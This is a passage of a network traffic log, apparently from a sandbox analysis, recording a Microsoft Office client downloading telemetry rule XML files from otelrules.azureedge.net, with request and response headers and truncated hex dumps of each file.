                                                                                                                                                                                                            2024-11-21 14:17:58 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            128192.168.2.64986213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:58 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:59 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:58 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                            x-ms-request-id: f909e935-c01e-0049-358c-3aac27000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141758Z-178bfbc474bnwsh4hC1NYC2ubs00000001kg00000000q0aw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:59 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            129192.168.2.64986313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:58 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:58 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                            x-ms-request-id: df1e4bb0-c01e-0034-6f8a-3a2af6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141758Z-1777c6cb754n67brhC1TEBcp9c0000000bc00000000007d3
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:59 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            130192.168.2.64986613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:58 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:59 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                            x-ms-request-id: e0bc54cd-b01e-00ab-7688-3bdafd000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141759Z-r1d97b99577d6qrbhC1TEBux5s0000000amg000000009e6m
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:59 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            131192.168.2.64987413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:00 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:00 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                            x-ms-request-id: 45806a8e-701e-003e-807c-3b79b3000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141800Z-1777c6cb7549j9hhhC1TEBzmcc0000000b0g00000000ph9e
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:00 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            132192.168.2.64987613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:00 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                            x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141801Z-r1d97b99577ckpmjhC1TEBrzs00000000akg000000004m7t
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:01 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            133192.168.2.64987513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:00 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                            x-ms-request-id: d8182971-801e-0067-2581-3bfe30000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141801Z-1777c6cb754n67brhC1TEBcp9c0000000b8000000000d9fx
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:01 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            134192.168.2.64987713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:00 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                            x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141801Z-178bfbc474bfw4gbhC1NYCunf400000001eg00000000tvq9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:01 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            135192.168.2.64988013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:00 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                            x-ms-request-id: 5a6b30d1-101e-00a2-7c5b-3b9f2e000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141801Z-178bfbc474b7cbwqhC1NYC8z4n00000001d000000000nht1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:01 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            136192.168.2.64989213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                            x-ms-request-id: c780bae6-901e-005b-04c5-3b2005000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141803Z-1777c6cb754gc8g6hC1TEB966c0000000b70000000009f7e
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
